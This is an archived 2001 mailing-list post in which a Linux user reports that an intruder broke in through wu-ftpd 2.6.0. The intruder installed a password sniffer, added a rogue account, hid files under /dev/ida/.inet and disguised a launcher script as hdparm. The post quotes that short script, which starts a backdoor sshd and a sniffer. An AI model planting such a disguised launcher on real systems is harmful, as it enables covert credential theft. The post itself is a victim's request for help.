ftp was hacked
From: R.A.Wilson (bud@styx.darbonne.com)Date: 12/28/01
- Next message: Ian Jones: "Re: ftp was hacked"
- Previous message: Kasper Dupont: "Re: small linux firewall/router advice"
- Next in thread: routed: "Re: ftp was hacked"
- Reply:(deleted message) routed: "Re: ftp was hacked"
- Reply: Ian Jones: "Re: ftp was hacked"
- Reply: gax: "Re: ftp was hacked"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 28 Dec 2001 16:18:40 +0000 From: "R.A.Wilson" <bud@styx.darbonne.com>
Hi -
I have some info to pass along, and a question...
A cracker exploited a hole in wu-ftp 2.6.0 and managed to install
a sniffer and a port scanner on my machine. I use slackware, 2.2.16
The only reason I found out is that a sharp Linux administrator noted
port scans coming from my machine and wanted to know what was going on.
I looked like the bad guy.
After a lot of work, I found the intruder had made a directory where
he put his sniffer log and other programs. He had them set up in:
/dev/ida/.inet
I don't believe that's a legitimate diretory.
When I looked at a file called tcp.log, in that directory, I was
stunned to see he had plain text passwords of all the users on my
machine. I couldn't pull the plug fast enough!
He also had managed to put an illegal account in /etc/passwd. He used
the account name www. I found files belonging to www and rm'd them.
I also took him out of the passwd file. I updated wu-ftp to the latest
version of 2.6.2 and thought that solved the problem.
A few days later I wanted to install a later version of hdparm. I was
using version 3.9 and 4.6 was out. I did a 'locate hdparm' and found
two of them: one in /use/bin/hdparm and the other in /use/sbin.hdparm.
Which was correct? I did 'which hdparm' and found the one in /usr/sbin
was it. it was also a binary file. Curious, I looked at the other one.
This is what it looked like:
#!/bin/sh
cd /dev/ida/.inet
./sshdu -f ./s
./linsniffer >> ./tcp.log &
cd /
So, just by a lucky accident I had discovered the intruder's script to
call his sniffer.
I tried to move the file. I tried to edit the file. I tried to remove
it. Nothing. Root cannot touch it! Here's the system message I get
when I try any of the above...
cannot unlink 'hdparm': Operation not permitted.
Now my question... HOW THE HELL DO I GET RID OF THIS GARBAGE???
-Roy Wilson-
===================================================================
- Next message: Ian Jones: "Re: ftp was hacked"
- Previous message: Kasper Dupont: "Re: small linux firewall/router advice"
- Next in thread: routed: "Re: ftp was hacked"
- Reply:(deleted message) routed: "Re: ftp was hacked"
- Reply: Ian Jones: "Re: ftp was hacked"
- Reply: gax: "Re: ftp was hacked"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
